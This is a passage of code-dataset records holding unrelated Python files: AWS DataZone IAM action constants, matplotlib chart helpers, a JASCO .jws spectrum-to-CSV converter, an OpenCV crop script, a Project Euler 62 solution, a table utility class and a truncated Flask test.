end_time-start_time))","sub_path":"utils/SuperPixel_Batch_Cityscapes.py","file_name":"SuperPixel_Batch_Cityscapes.py","file_ext":"py","file_size_in_byte":1216,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"451354558","text":"# Copyright (c) 2012-2021, Mark Peek \n# All rights reserved.\n#\n# See LICENSE file for full license.\n\nfrom typing import Optional\n\nfrom .aws import Action as BaseAction\nfrom .aws import BaseARN\n\nservice_name = \"Amazon DataZone\"\nprefix = \"datazone\"\n\n\nclass Action(BaseAction):\n    def __init__(self, action: Optional[str] = None) -> None:\n        super().__init__(prefix, action)\n\n\nclass ARN(BaseARN):\n    def __init__(self, resource: str = \"\", region: str = \"\", account: str = \"\") -> None:\n        super().__init__(\n            service=prefix, resource=resource, region=region, account=account\n        )\n\n\nGetProject = Action(\"GetProject\")\nGetProjectConfiguration = Action(\"GetProjectConfiguration\")\nGetProjectCredentials = Action(\"GetProjectCredentials\")\nListProjects = Action(\"ListProjects\")\nListUserProjects = Action(\"ListUserProjects\")\n","sub_path":"awacs/datazone.py","file_name":"datazone.py","file_ext":"py","file_size_in_byte":854,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"36019655","text":"# this module will host a bunch of helper functions while we figure what all we can fo with the graph api.\n# once we figure that out, we will re-organize this module\nimport matplotlib.pyplot as plt\nplt.rcdefaults()\nimport numpy as np\n\ndef read_access_token_from_file(local_file_name):\n    with open(local_file_name, \"r\") as fid:\n        return fid.readline()\n    \ndef convert_time_zone(from_date_time, from_zone='UTC', to_zone='America/New_York'):\n    from datetime import datetime\n    from dateutil import tz\n    from_zone, to_zone = tz.gettz(from_zone), tz.gettz(to_zone)\n    # Tell the datetime object that it's in from_zone time zone since datetime objects are 'naive' by default    \n    from_date_time = from_date_time.replace(tzinfo=from_zone)\n    return from_date_time.astimezone(to_zone)\n\ndef plot_bar_chart(objects, values, y_label, title, x_label_rotation=70, x_label_fontsize=8):\n    y_pos = np.arange(len(objects))\n    plt.bar(y_pos, values, align='center', alpha=0.5)\n    plt.xticks(y_pos, objects, rotation=x_label_rotation, fontsize=x_label_fontsize)\n    plt.ylabel(y_label)\n    plt.title(title)\n    plt.grid()\n    plt.show()    \n    return\n\ndef plot_pie_chart(values, labels, title, explode=None, show_legend=True, hide_labels_in_chart=False, smart_legends = False):\n    explode = explode if explode else [0.0 for _ in labels]\n    if hide_labels_in_chart:\n        plt.pie(values, explode=explode, startangle=90)\n    else:\n        plt.pie(values, labels=labels, explode=explode, startangle=90)        \n    if show_legend:\n        if smart_legends:\n            total_sum = sum(values)\n            smart_legend_labels = []\n            for value, label in zip(values, labels):\n                percentage = ''.join([str(round(value*100/total_sum, 2)), '%'])\n                smart_label = \"%s: (%s, %s).\"%(label, str(percentage), value)\n                smart_legend_labels.append(smart_label)\n            plt.legend(labels=smart_legend_labels)\n        else:\n            plt.legend(labels=labels)            \n    plt.title(title)\n    plt.show()    \n    return","sub_path":"common.py","file_name":"common.py","file_ext":"py","file_size_in_byte":2068,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"470763397","text":"#/usr/bin/python\r\n#coding:utf-8\r\n\r\n\r\nimport os\r\nimport struct\r\nfrom sys import exit\r\nimport sys\r\nimport csv\r\n\r\nimport numpy\r\nimport numpy as np\r\n\r\n\r\nimport tkinter\r\nimport tkinter.filedialog\r\nfrom time import sleep\r\n\r\nprint('jwsファイルをcsvに一括変換します')\r\nsleep(0.5)\r\nprint('csvファイルはdataフォルダに保存されます')\r\nsleep(0.5)\r\nprint(' ')\r\n\r\n#######################################################################################\r\nfor i in range(3):\r\n    try:\r\n        print('測定開始波長(低波長側)を入力してください。 デフォルト値:300 ')\r\n        x_for_first_point = input()\r\n        if x_for_first_point == \"\":\r\n            x_for_first_point = 300\r\n        \r\n        x_for_first_point = int(x_for_first_point)\r\n\r\n        print('測定開始波長(高波長側)を入力してください。 デフォルト値:2500')\r\n        x_for_last_point = input()\r\n        if x_for_last_point == \"\":\r\n            x_for_last_point = 2500\r\n\r\n        x_for_last_point = int(x_for_last_point)\r\n\r\n        print('測定波長刻���を入力してください。 デフォルト値:5')\r\n        x_step = input()\r\n        if x_step == \"\":\r\n            x_step = 5\r\n        x_step = int(x_step)\r\n\r\n        # (2500-300)/ 5 + 1 = 441 *測定波長の数\r\n        x_point_number = (x_for_last_point - x_for_first_point) / x_step + 1\r\n        \r\n    except:\r\n        if i!=2:\r\n            print('入力データが整数値ではありません。再度入力してください')\r\n    else:\r\n        break\r\nelse:\r\n    print('入力データが整数値ではありません。プログラムを終了します。')\r\n    sleep(2)\r\n    exit()\r\n\r\nprint('')\r\nprint('測定開始波長',x_for_first_point)\r\nprint('測定終了波長',x_for_last_point)\r\nprint('測定波長刻み',x_step)\r\nsleep(0.5)\r\n\r\n#######################################################################################\r\nfor i in range(3):\r\n    try:\r\n        print('S偏光データとP偏光データを合成しますか。yes/no デフォルト値:yes ')\r\n        answer = input()\r\n        if answer in ['yes','y','ye','']:\r\n            is_synthesizing = True\r\n            sleep(0.2)\r\n            print('S偏光データとP偏光データを合成します')\r\n\r\n        elif answer in ['no','n']:\r\n            is_synthesizing = False\r\n            sleep(0.2)\r\n            print('データを合成しません')\r\n    except:\r\n        if i!=2:\r\n            print('再度入力してください')\r\n    else:\r\n        break\r\nelse:\r\n    print('プログラムを終了します。')\r\n    sleep(2)\r\n    exit()\r\n\r\n\r\n#######################################################################################\r\n\r\ntk = tkinter.Tk()\r\ntk.withdraw()\r\ncurrentdirectory = os.getcwd()\r\n\r\nprint('jwsファイルを選んでください')\r\nsleep(0.3)\r\n\r\njwsfile_path  = tkinter.filedialog.askopenfilename(initialdir = currentdirectory, \r\ntitle = 'jwsファイルを1つ選択してください。 同フォルダ内のすべてのjwsファイルを変換します。', filetypes = [('jws File', '*.jws')])\r\njwsfolder_path = os.path.dirname(jwsfile_path)\r\nos.chdir(jwsfolder_path)\r\n\r\ntry:\r\n    filelist = os.walk(jwsfolder_path).__next__()[2]\r\nexcept:\r\n    filelist = os.walk(jwsfolder_path).next()[2]\r\n\r\n#拡張子が.jwsであるファイルを抽出\r\nfilelist_jws = [os.path.splitext(i)[0] for i in filelist if os.path.splitext(i)[1]=='.jws']\r\n\r\n#ファイル名末尾がs-1やp-1であるファイルを抽出\r\nfilelist_jws_s = [i for i in filelist_jws if i[-3:] == 's-1' or i[-3:] == 'S-1']\r\nfilelist_jws_p = [i for i in filelist_jws if i[-3:] == 'p-1' or i[-3:] == 'P-1']\r\n\r\n#ファイル名末尾がs-1やp-1であるファイルを抽出し、末尾を除いたファイル名を取得\r\n#.lowerで大文字を全て小文字に変換\r\nfilelist_jws_s_ext = [i[:-3].lower() for i in filelist_jws if i[-3:] == 's-1' or i[-3:] == 'S-1']\r\nfilelist_jws_p_ext = [i[:-3].lower() for i in filelist_jws if i[-3:] == 'p-1' or i[-3:] == 'P-1']\r\n\r\n#S偏光、P偏光データの共通ファイル名が等しいファイルを抽出\r\nfilelist_s_p = set(filelist_jws_s_ext) & set(filelist_jws_p_ext)\r\n\r\n# データを格納するフォルダを作成する\r\nif os.path.exists(\"data\") == False:\r\n    try:\r\n        os.mkdir(\"data\")\r\n        print(\"dataフォルダを作成しました\")\r\n    except:\r\n        print(\"dataフォルダの作成に失敗しました\")\r\nelse:\r\n        print(\"dataフォルダはすでに存在しています\")\r\n        \r\n# データを格納するフォルダを作成する\r\nif os.path.exists(\"data-SP\") == False:\r\n    try:\r\n        os.mkdir(\"data-SP\")\r\n        print(\"data-SPフォルダを作成しました\")\r\n    except:\r\n        print(\"data-SPフォルダの作成に失敗しました\")\r\nelse:\r\n        print(\"data-SPフォルダはすでに存在しています\")\r\n\r\n\r\nwavelength_csv = numpy.arange(x_for_last_point, x_for_first_point - x_step, -x_step)\r\nwavelength_csv = numpy.array(wavelength_csv, ndmin=2)\r\n\r\nheader_allcsv = ['wavelength']\r\nheader_allcsv_s_p = ['wavelength']\r\nbody_allcsv = wavelength_csv.T\r\nbody_allcsv_s_p = wavelength_csv.T\r\n\r\nsleep(0.3)\r\nprint('変換を開始します')\r\nsleep(0.3)\r\n\r\n# 各ファイルごとに処理をする\r\nfor filename in filelist_jws:\r\n\r\n    with open(filename + \".jws\", \"rb\") as f:\r\n        # xの開始、終端、ステップをヘッダーから取得する。\r\n        print(\"filename: \" , filename)\r\n\r\n        # intensityデータを取得する\r\n        # バイナリデータにおいてデータが始まるアドレスが0xC80、0xE00の2パターンありそう\r\n        #0xC80から始まる場合は、0xB80 から4D 00 6F 00 64 00 75 のバイナリデータ\r\n        #0xE00から始まる場合は、0xD80 から4D 00 6F 00 64 00 75 のバイナリデータ\r\n        #上記をもとに条件分岐する\r\n        \r\n        \r\n        data = \"\"\r\n\r\n\r\n        is_datainfo_A00 = False\r\n        \r\n        is_blank_C00 = False\r\n        is_blank_C40 = False\r\n        is_blank_C80 = False\r\n        \r\n        \r\n        is_data_C00 = False\r\n        is_data_C40 = False\r\n        is_data_C80 = False\r\n        \r\n        \r\n        is_datainfo_C00 = False\r\n        is_AC0 = False\r\n        \r\n        x_A00 = \"\"\r\n        x_AC0 = \"\"\r\n\r\n        x_C00 = \"\"\r\n        x_C01 = \"\"\r\n        x_C02 = \"\"\r\n        x_C03 = \"\"\r\n        x_C04 = \"\"\r\n        x_C05 = \"\"\r\n        x_C06 = \"\"\r\n\r\n        x_C40 = \"\"\r\n        x_C41 = \"\"\r\n        x_C42 = \"\"\r\n        x_C43 = \"\"\r\n        x_C44 = \"\"\r\n        x_C45 = \"\"\r\n        x_C46 = \"\"\r\n\r\n        x_C80 = \"\"\r\n        x_C81 = \"\"\r\n        x_C82 = \"\"\r\n        x_C83 = \"\"\r\n        x_C84 = \"\"\r\n        x_C85 = \"\"\r\n        x_C86 = \"\"\r\n\r\n\r\n\r\n\r\n        f.seek(0xA00)\r\n        x_A00 = f.read(8)\r\n        #print('x_A00')\r\n        #print(x_A00)\r\n        if x_A00 == b'D\\x00a\\x00t\\x00a\\x00':\r\n            #print('x_A00')\r\n            #print(x_A00)\r\n            is_datainfo_A00 = True\r\n            #print('datainfo start at A00')\r\n\r\n\r\n        f.seek(0xC00)\r\n        x_C00 = f.read(1)\r\n        f.seek(0xC01)\r\n        x_C01 = f.read(1)\r\n        f.seek(0xC02)\r\n        x_C02 = f.read(1)\r\n        f.seek(0xC03)\r\n        x_C03 = f.read(1)\r\n        f.seek(0xC04)\r\n        x_C04 = f.read(1)\r\n        f.seek(0xC05)\r\n        x_C05 = f.read(1)\r\n        f.seek(0xC06)\r\n        x_C06 = f.read(1)\r\n\r\n\r\n        if  1*(x_C00 == b'\\x00') +\\\r\n            1*(x_C01 == b'\\x00') +\\\r\n            1*(x_C02 == b'\\x00') +\\\r\n            1*(x_C03 == b'\\x00') +\\\r\n            1*(x_C04 == b'\\x00') +\\\r\n            1*(x_C05 == b'\\x00') +\\\r\n            1*(x_C06 == b'\\x00') >= 3:\r\n\r\n            is_blank_C00 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            #print('C00 is not blank')\r\n\r\n        # check the C40 - C45\r\n        f.seek(0xC40)\r\n        x_C40 = f.read(1)\r\n        f.seek(0xC41)\r\n        x_C41 = f.read(1)\r\n        f.seek(0xC42)\r\n        x_C42 = f.read(1)\r\n        f.seek(0xC43)\r\n        x_C43 = f.read(1)\r\n        f.seek(0xC44)\r\n        x_C44 = f.read(1)\r\n        f.seek(0xC45)\r\n        x_C45 = f.read(1)\r\n        f.seek(0xC46)\r\n        x_C46 = f.read(1)\r\n\r\n        if  1*(x_C40 == b'\\x00') +\\\r\n            1*(x_C41 == b'\\x00') +\\\r\n            1*(x_C42 == b'\\x00') +\\\r\n            1*(x_C43 == b'\\x00') +\\\r\n            1*(x_C44 == b'\\x00') +\\\r\n            1*(x_C45 == b'\\x00') +\\\r\n            1*(x_C46 == b'\\x00') >= 3:\r\n\r\n            is_blank_C40 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            #print('C00 is not blank')    \r\n\r\n        # check the C80 - C85\r\n        f.seek(0xC80)\r\n        x_C80 = f.read(1)\r\n        f.seek(0xC81)\r\n        x_C81 = f.read(1)\r\n        f.seek(0xC82)\r\n        x_C82 = f.read(1)\r\n        f.seek(0xC83)\r\n        x_C83 = f.read(1)\r\n        f.seek(0xC84)\r\n        x_C84 = f.read(1)\r\n        f.seek(0xC85)\r\n        x_C85 = f.read(1)\r\n        f.seek(0xC86)\r\n        x_C86 = f.read(1)\r\n\r\n\r\n        if  1*(x_C80 == b'\\x00') +\\\r\n            1*(x_C81 == b'\\x00') +\\\r\n            1*(x_C82 == b'\\x00') +\\\r\n            1*(x_C83 == b'\\x00') +\\\r\n            1*(x_C84 == b'\\x00') +\\\r\n            1*(x_C85 == b'\\x00') +\\\r\n            1*(x_C86 == b'\\x00') >= 3:\r\n\r\n            is_blank_C80 = True\r\n            #print('C00 is blank')\r\n        else :\r\n            pass\r\n            #print('C00 is not blank')  \r\n\r\n        #print(is_blank_C00)\r\n        #print(is_blank_C40)\r\n        #print(is_blank_C80)\r\n\r\n\r\n\r\n        if is_datainfo_A00 == True and is_blank_C00 == False:\r\n            is_data_C00 = True\r\n            #print('C00からデータあり')\r\n        \r\n        elif is_datainfo_A00 == True and  is_blank_C00 == True and is_blank_C40 == False :\r\n            is_data_C40 = True\r\n            #print('C40からデータあり')\r\n        \r\n        elif is_datainfo_A00 == True and is_blank_C00 == True and is_blank_C40 == True and is_blank_C80 == False:\r\n            is_data_C80 = True\r\n            #print('C80からデータあり')\r\n        \r\n        else:\r\n            pass\r\n            #print('想定の範囲外です')\r\n\r\n\r\n\r\n\r\n        f.seek(0xC00)\r\n        x_C00 = f.read(8)\r\n        #print(x_C00)\r\n        if x_C00 == b'D\\x00a\\x00t\\x00a\\x00':\r\n            is_datainfo_C00 = True\r\n            #print('datainfo start at C00')\r\n\r\n        if  is_data_C00 == True:\r\n            #print('from 0xC00, not seperate')\r\n            f.seek(0xC00)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n\r\n        elif is_data_C40 == True:\r\n            #print('from 0xC40, not seperate')\r\n            f.seek(0xC40)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n  \r\n        elif is_data_C80 == True:\r\n            #print('from 0xC80, not seperate')\r\n            f.seek(0xC80)\r\n            x = f.read(int(x_point_number * 4))\r\n            data = x\r\n        \r\n        elif is_datainfo_A00 == True :\r\n            pass\r\n            \r\n\r\n        if is_datainfo_C00 == True :\r\n            #DataInfoの前のバイト数が256の場合と320の場合がある。\r\n            #無理やり場合分け\r\n            \r\n            #320の場合は\r\n            is_AC0 = False\r\n            f.seek(0xAC0)\r\n            x_AC0 = f.read(4)\r\n            \r\n            #print('x_AC0')\r\n            #print(x_AC0)\r\n            \r\n            if x_AC0 != b'\\x00\\x00\\x00\\x00' :\r\n                #x_AC0が0ではない\r\n                #AC0からデータが始まっている場合\r\n                #print('x_AC0')\r\n                \r\n                #print(x_AC0)\r\n                is_AC0 = True\r\n            else:\r\n                is_AC0 = False\r\n                \r\n            #print('is_AC0')\r\n            \r\n            #print(is_AC0)\r\n\r\n            if is_AC0 == True:\r\n                #print('1st data series from 0xAC0 2nd data series from E00')\r\n\r\n                f.seek(0xAC0)\r\n                x = f.read(320)\r\n\r\n                f.seek(0xE00)\r\n                y = f.read(int(x_point_number * 4)- 320)\r\n\r\n            \r\n            elif is_AC0 == False:\r\n                #print('1st data series from 0xB00 2nd data series from E00')\r\n            \r\n                f.seek(0xB00)\r\n                x = f.read(256)\r\n\r\n                f.seek(0xE00)\r\n                y = f.read(int(x_point_number * 4)- 256)\r\n\r\n            data = x + y\r\n                \r\n        #print('is_datainfo_A00', is_datainfo_A00)\r\n        #print('is_blank_C00', is_blank_C00)\r\n        #print('is_blank_C40', is_blank_C40)\r\n        #print('is_blank_C80', is_blank_C80)\r\n        #print('is_datainfo_C00', is_datainfo_C00)\r\n        #print('is_AC0', is_AC0)\r\n        #print('data')\r\n        #print(data)\r\n\r\n        spectra_csv = numpy.array(struct.unpack(\"{0}f\".format(int(x_point_number)), data))\r\n        spectra_csv = numpy.array(spectra_csv,ndmin=2)\r\n        body_csv = numpy.hstack((wavelength_csv.T,spectra_csv.T))\r\n        \r\n        header_csv = ['wavelength',filename]\r\n    \r\n        #for all data csv\r\n        header_allcsv.append(filename)\r\n        body_allcsv = numpy.hstack([body_allcsv,spectra_csv.T])\r\n        \r\n    # データをcsvに書きだす。\r\n    with open(\"data/\" + filename + \".csv\", \"w\", newline='') as expoted_data_obj:\r\n        writer_csv = csv.writer(expoted_data_obj)\r\n        writer_csv.writerow(header_csv)\r\n        writer_csv.writerows(body_csv)\r\n        \r\nif is_synthesizing == True:\r\n    for filename in filelist_s_p:\r\n        spectra_s = []\r\n        spectra_p = []\r\n        \r\n\r\n        with open('data/' + filename + \"s-1.csv\", \"r\") as f_s:\r\n            reader_s = csv.reader(f_s)\r\n            header_s = next(reader_s)\r\n            \r\n            for row_s in reader_s:\r\n                row_s_fl = [float(n) for n in row_s]\r\n                spectra_s.append(row_s_fl)\r\n            \r\n            spectra_s = np.array(spectra_s)\r\n            spectra_s = spectra_s[:,1]\r\n            #print(spectra_s)\r\n\r\n        with open('data/' + filename + \"p-1.csv\", \"r\") as f_p:\r\n            reader_p = csv.reader(f_p)\r\n            header_p = next(reader_p)\r\n            \r\n            for row_p in reader_p:\r\n                row_p_fl = [float(n) for n in row_p]\r\n                spectra_p.append(row_p_fl)\r\n\r\n            spectra_p = np.array(spectra_p)\r\n            spectra_p = spectra_p[:,1]            \r\n            #print(spectra_p)\r\n\r\n\r\n        spectra_s = numpy.array(spectra_s)\r\n        spectra_p = numpy.array(spectra_p)\r\n\r\n        #print(spectra_s)\r\n        #print(spectra_p)\r\n\r\n        spectra_csv_s_p = (spectra_s + spectra_p ) * 0.5\r\n        \r\n        wavelength_csv = np.array(wavelength_csv)\r\n\r\n        spectra_csv_s_p = np.array(spectra_csv_s_p)\r\n        spectra_csv_s_p = spectra_csv_s_p.reshape(441,1)\r\n\r\n        body_csv_s_p = numpy.hstack((wavelength_csv.T, spectra_csv_s_p))\r\n        header_csv_s_p = ['wavelength', filename + 's_p']\r\n        print(\"filename: \" , filename + \"SP\")\r\n        \r\n        # データをcsvに書きだす。\r\n        with open(\"data-SP/\" + filename + \"SP.csv\", \"w\", newline='') as expoted_data_obj_s_p:\r\n            writer_csv = csv.writer(expoted_data_obj_s_p)\r\n            writer_csv.writerow(header_csv_s_p)\r\n            writer_csv.writerows(body_csv_s_p)\r\n    \r\n        #for all data csv\r\n        header_allcsv_s_p.append(filename + 's_p')\r\n        body_allcsv_s_p = numpy.hstack([body_allcsv_s_p,spectra_csv_s_p])\r\n\r\n\r\nwith open('all.csv', 'w', newline='') as exported_alldata_obj:\r\n    writer_allcsv = csv.writer(exported_alldata_obj)\r\n    writer_allcsv.writerow(header_allcsv)\r\n    writer_allcsv.writerows(body_allcsv)\r\n\r\nif is_synthesizing == True:\r\n    with open( 'all_s_p.csv', 'w', newline='') as exported_alldata_obj_s_p:\r\n        writer_allcsv_s_p = csv.writer(exported_alldata_obj_s_p)\r\n        writer_allcsv_s_p.writerow(header_allcsv_s_p)\r\n        writer_allcsv_s_p.writerows(body_allcsv_s_p)\r\n\r\nprint('csvファイルへの変換を完了しました。')\r\nsleep(1)","sub_path":"convertjws_20190305.py","file_name":"convertjws_20190305.py","file_ext":"py","file_size_in_byte":15924,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"488071581","text":"# import the necessary packages\nfrom shapedetector import ShapeDetector\nimport argparse\nimport imutils\nimport numpy as np\nimport cv2\n\n# construct the argument parse and parse the arguments\nap = argparse.ArgumentParser()\nap.add_argument(\"-i\", \"--image\", required=True,\n\thelp=\"path to the input image\")\nargs = vars(ap.parse_args())\n\n# load the image and resize it to a smaller factor so that\n# the shapes can be approximated better\nimage = cv2.imread(args[\"image\"])\nresized = imutils.resize(image, width=1200)\nratio = image.shape[0] / float(resized.shape[0])\n\ncrop = resized[1240+426,896+275]\ncv2.imshow(\"crop\",crop)\ncv2.waitKey(11000)\ncv2.destroyAllWindows()\ncv2.waitKey(1)\n","sub_path":"crop1.py","file_name":"crop1.py","file_ext":"py","file_size_in_byte":673,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"89014733","text":"'''\nProblem 62\n\nThe cube, 41063625 (3453), can be permuted to produce two other cubes: 56623104 (3843) and 66430125 (4053). In fact, 41063625 is the smallest cube which has exactly three permutations of its digits which are also cube.\n\nFind the smallest cube for which exactly five permutations of its digits are cube.\n'''\n\nimport time\n\ndef split_digits(n):\n\tdef split(n, arr):\n\t\tif n == 0:\n\t\t\treturn sorted(arr[::-1])\n\t\telse:\n\t\t\treturn split(n//10, arr + [n%10])\n\treturn tuple(split(n, []))\n\ndef cubic_permutations():\n\ti, cubic_map = 22, {}\n\twhile True:\n\t\tcubed_val = i**3\n\t\tsplit_num = split_digits(cubed_val)\n\t\tif split_num in cubic_map:\n\t\t\tcubic_map[split_num] += [cubed_val]\n\t\telse:\n\t\t\tcubic_map[split_num] = [cubed_val]\n\n\t\tif len(cubic_map[split_num]) == 5:\n\t\t\treturn cubic_map[split_num][0]\n\n\t\ti = i + 1\n\nif __name__ == '__main__':\n\n\tstart = time.time()\n\tprint(cubic_permutations())\n\tend = time.time()\n\n\tprint(\"Execution time: %fs\" %(end - start))\n","sub_path":"solutions/cubic_permutations.py","file_name":"cubic_permutations.py","file_ext":"py","file_size_in_byte":955,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"313980600","text":"# -*- coding: utf-8 -*\n\nimport time\nimport datetime\nfrom datetime import datetime as dt, date, time as tm\n\nclass Tools:\n\tdef __init__(self, errors):\n\t\tself.errors = errors\n\t\n\tdef explode(self, line, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tstr_array = line.split(sep)\n\n\t\treturn str_array\n\t\n\tdef implode(self, str_array, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tline = sep.join(str_array)\n\t\t\n\t\treturn line\n\t\t\n\tdef line2rec(self, line, cols, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\trec = {}\n\t\tstr_array = self.explode(line, sep)\n\t\tlength = min(len(str_array), len(cols))\n\t\tfor cnt in range(length):\n\t\t\trec[cols[cnt]] = str_array[cnt]\n\n\t\treturn rec\n\t\t\n\tdef rec2line(self, rec, cols, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tstr_array = []\n\t\tfor col in cols:\n\t\t\tif rec.get(col) != None:\n\t\t\t\tstr_array.append(rec[col])\n\t\t\n\t\tline = self.implode(str_array, sep)\n\t\t\n\t\treturn line\n\t\t\n\tdef str2type(self, value, value_type, sep=','):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tif value_type == 'str':\n\t\t\treturn value\n\t\t\n\t\telif value_type == 'int':\n\t\t\treturn int(value)\n\t\t\n\t\telif value_type == 'num' or value_type == 'float':\n\t\t\treturn float(value)\n\t\t\n\t\telif value_type == 'bool':\n\t\t\tif value == '1':\n\t\t\t\treturn True\n\t\t\telse:\n\t\t\t\treturn False\n\t\t\t\t\n\t\telif value_type == 'yyyymmdd':\n\t\t\treturn dt.strptime(value, '%Y%m%d') #.date()\n\t\t\t\n\t\telif value_type == 'hhmmss':\n\t\t\treturn dt.strptime(value, '%H%M%S') #.time()\n\t\t\t\n\t\telif value_type == 'str_array':\n\t\t\treturn self.explode(value, sep)\n\t\t\n\t\telif value_type == 'int_array':\n\t\t\tint_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tint_array.append(int(s))\n\t\t\treturn int_array\n\t\t\n\t\telif value_type == 'num_array' or value_type == 'float_array':\n\t\t\tfloat_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tfloat_array.append(float(s))\n\t\t\treturn float_array\n\t\t\n\t\telif value_type == 'bool_array':\n\t\t\tbool_array = []\n\t\t\tstr_array = self.explode(value, sep)\n\t\t\tfor s in str_array:\n\t\t\t\tif value == '1':\n\t\t\t\t\tbool_array.append(True)\n\t\t\t\telse:\n\t\t\t\t\tbool_array.append(False)\n\t\t\treturn bool_array\n\t\t\n\t\telif value_type == 'escape':\n\t\t\treturn  self.escape_sequence(value)\n\t\t\t\n\t\telse:\n\t\t\tself.errors.raise_error('Unknown type ' + value_type)\n\t\t\treturn value\n\t\n\tdef type2str(self, value, value_format):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tif value == None:\n\t\t\treturn ''\n\t\t\n\t\tif value_format == '%Y%m%d':\n\t\t\treturn dt.strftime(value, '%Y%m%d')\n\t\t\t\n\t\telif value_format == '%H%M%S':\n\t\t\treturn dt.strftime(value, '%H%M%S')\n\t\t\t\n\t\telse:\n\t\t\treturn value_format.format(value)\n\t\n\tdef shape_column_types(self, columns, file_column_types):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\t\n\t\tcolumn_types = {}\n\t\tfor col in columns:\n\t\t\tif file_column_types.get(col) != None:\n\t\t\t\tcolumn_types[col] = file_column_types[col]\n\t\t\telse:\n\t\t\t\t# self.errors.raise_error('Unknown column ' + col + ' for type detecting')\n\t\t\t\t# break\n\t\t\t\tcolumn_types[col] = 'num'\n\t\t\t\t\n\t\treturn column_types\n\t\t\n\tdef shape_column_formats(self, columns, all_column_formats):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\t\n\t\tcolumn_formats = {}\n\t\tfor col in columns:\n\t\t\tif all_column_formats.get(col) != None:\n\t\t\t\tcolumn_formats[col] = all_column_formats[col]\n\t\t\telse:\n\t\t\t\t# self.errors.raise_error('Unknown column ' + col + ' for format detecting')\n\t\t\t\t# break\n\t\t\t\tcolumn_formats[col] = '{:.2f}'\n\t\t\n\t\treturn column_formats\n\t\n\tdef type_rec(self, rec, column_types):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in rec:\n\t\t\trec[col] = self.str2type(rec[col], column_types[col])\n\t\t\t\n\tdef str_rec(self, rec, column_formats):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in rec:\n\t\t\trec[col] = self.type2str(rec[col], column_formats[col])\n\t\n\tdef add_rec_to_table(self, rec, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor col in table:\n\t\t\tif rec.get(col) != None:\n\t\t\t\ttable[col].append(rec[col])\n\t\t\telse:\n\t\t\t\ttable[col].append(None)\n\t\n\tdef get_rec_from_table(self, rec_cnt, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\trec = {}\n\t\tfor col in table:\n\t\t\trec[col] = table[col][rec_cnt]\n\t\t\n\t\treturn rec\n\t\t\n\tdef add_columns(self, adv_columns, table, columns):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tfor adv_col in adv_columns:\n\t\t\tcolumns.append(adv_col)\n\t\t\ttable[adv_col] = []\n\t\t\tlength = len(table[columns[0]])\n\t\t\tfor i in range(length):\n\t\t\t\ttable[adv_col].append(None)\n\t\t\n\tdef update_cells(self, cell_columns, cell_values, rec_cnt, table):\n\t\tif self.errors.error_occured:\n\t\t\treturn None\n\t\t\n\t\tlength = min(len(cell_columns), len(cell_values))\n\t\tfor cnt in range(length):\n\t\t\tif table.get(cell_columns[cnt]) != None:\n\t\t\t\ttable[cell_columns[cnt]][rec_cnt] = cell_values[cnt]\n\t\t\t\t\n\tdef escape_sequence(self, seq):\n\t\tif seq == \"'\\\\t'\":\n\t\t\tseq = seq.replace(\"'\\\\t'\", '\\t')\n\t\telif seq == \"','\":\n\t\t\tseq = seq.replace(\"','\", ',')\n\t\telif seq == \"'.'\":\n\t\t\tseq = seq.replace(\"','\", ',')\n\t\telif seq == \"';'\": \n\t\t\tseq = seq.replace(\"';'\", ';')\n\t\telif seq == \"''\":\n\t\t\tseq = seq.replace(\"''\", '')\n\t\telse:\n\t\t\tself.errors.raise_error('Unknown escape sequence ' + seq)\n\t\treturn seq\n\t\t\n\t\t\n","sub_path":"scripts/modules/common/Tools.py","file_name":"Tools.py","file_ext":"py","file_size_in_byte":5180,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"74"}
+{"seq_id":"476240557","text":"import DB_connection_app\nimport unittest\nimport json\nfrom werkzeug.http import parse_cookie\n\nclass DB_connection_appTestCase(unittest.TestCase):\n    def setUp(self):\n        DB_connection_app.app.config['TESTING'] = True\n        self.app = DB_connection_app.app.test_client()\n\n\n    def test_index(self):\n        \"\"\" Ensures that flask was set up correctly \"\"\"\n        tester = DB_connection_app.app.test_client(self)\n        response = tester.get('/', content_type='html/text')\n        self.assertEqual(response.status_code, 200)\n\n    # assert functions\n    def test_content(self):\n        \"\"\"Ensure HTML file being rendered has the right contents \"\"\"\n        rv = self.app.get('/')\n        assert b'Find My location' in rv.data\n        assert b'Find Closest Stations' in rv.data\n        assert b'Availability' in rv.data\n\n    def test_dummy(self):\n        \"\"\" Ensures that JSON file from database is being read properly \"\"\"\n        response = self.app.get(\"/station/static\")\n        data = json.loads(response.get_data(as_text=True))\n\n        self.assertEqual(data[0]['address'], \"Chatham 